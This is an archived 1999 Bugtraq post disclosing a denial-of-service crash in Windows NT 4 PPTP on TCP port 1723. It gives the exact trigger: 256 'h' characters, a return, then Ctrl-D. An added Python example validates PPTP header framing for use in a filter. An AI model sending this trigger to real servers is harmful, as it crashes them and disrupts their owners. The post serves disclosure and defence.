[10358] in bugtraq


Possible DOS in WinNT RAS (PPTP)

daemon@ATHENA.MIT.EDU (Simon Helson)
Mon Apr 26 18:03:39 1999

Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id: <4.2.0.32.19990427092053.009ad9a0@203.97.185.82>
Date: 	Tue, 27 Apr 1999 09:29:06 -0700
Reply-To: Simon Helson <simon@CONCEPTS.CO.NZ>
From: Simon Helson <simon@CONCEPTS.CO.NZ>
To: BUGTRAQ@NETSPACE.ORG

Please excuse if this has been posted before, I did a quick search of the
archives and found nothing.
This hasn't been sent to MS, as I don't know an email address to send it
to, Aleph, if you find it worthy of sending, please forward a copy to the
MS people for their attention. Cheers.

I was playing around with PPTP last night, and discovered that, with "very"
minimal effort, I could cause my friend's NT Server (version 4, service pack
4) to reboot instantly, without shutting down. All I did was telnet to the
port (1723) on the NT box, and then send the following data.

hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhh (that's 256 'h's for those who don't want to
count :-)

and hit return. Nothing. BUT, then I hit ^D and all hell broke loose. The
NT server dropped like a stone, full hardware reboot.

I tested this multiple times and always got the same response.

The NT Server was version 4, with Service pack 4 applied.

Cheers

Simon
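
Added example, not part of the original post: a Python check that a proxy or IDS in front of TCP/1723 could apply to the first bytes a client sends, using the PPTP control message header layout from RFC 2637 (length, message type, magic cookie 0x1A2B3C4D, control message type). The function name and both sample byte strings are constructed for illustration; it shows that the input described above fails header validation and makes no claim about why the server crashed.

```python
import struct

# PPTP control message header fields (RFC 2637), network byte order:
# length, PPTP message type, magic cookie, control message type, reserved0
HEADER = struct.Struct("!HHIHH")
PPTP_MAGIC_COOKIE = 0x1A2B3C4D
PPTP_MSG_CONTROL = 1
SCCRQ = 1            # Start-Control-Connection-Request, always first
SCCRQ_LENGTH = 156   # fixed total length of that message


def check_first_pptp_message(stream: bytes) -> str:
    """Classify the first bytes received on a new TCP/1723 connection."""
    if len(stream) < HEADER.size:
        return "incomplete"
    length, msg_type, cookie, ctrl_type, _reserved = HEADER.unpack_from(stream)
    if cookie != PPTP_MAGIC_COOKIE:
        return "bad-magic-cookie"      # stream is not PPTP framing at all
    if msg_type != PPTP_MSG_CONTROL:
        return "bad-message-type"
    if ctrl_type != SCCRQ:
        return "unexpected-control-type"
    if length != SCCRQ_LENGTH:
        return "bad-length"
    if len(stream) < length:
        return "incomplete"
    return "ok"


# Constructed sample: the input described in the post (256 'h' plus return).
REPORTED_INPUT = b"h" * 256 + b"\r\n"

# Constructed sample: a well-framed request with a zeroed 144-byte body.
VALID_SCCRQ = HEADER.pack(SCCRQ_LENGTH, PPTP_MSG_CONTROL,
                          PPTP_MAGIC_COOKIE, SCCRQ, 0) + bytes(144)

if __name__ == "__main__":
    for name, data in (("reported", REPORTED_INPUT), ("valid", VALID_SCCRQ)):
        print(name, check_first_pptp_message(data))
```

A connection whose first message is classified as anything other than "ok" or "incomplete" can be logged and closed before it reaches the PPTP service.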
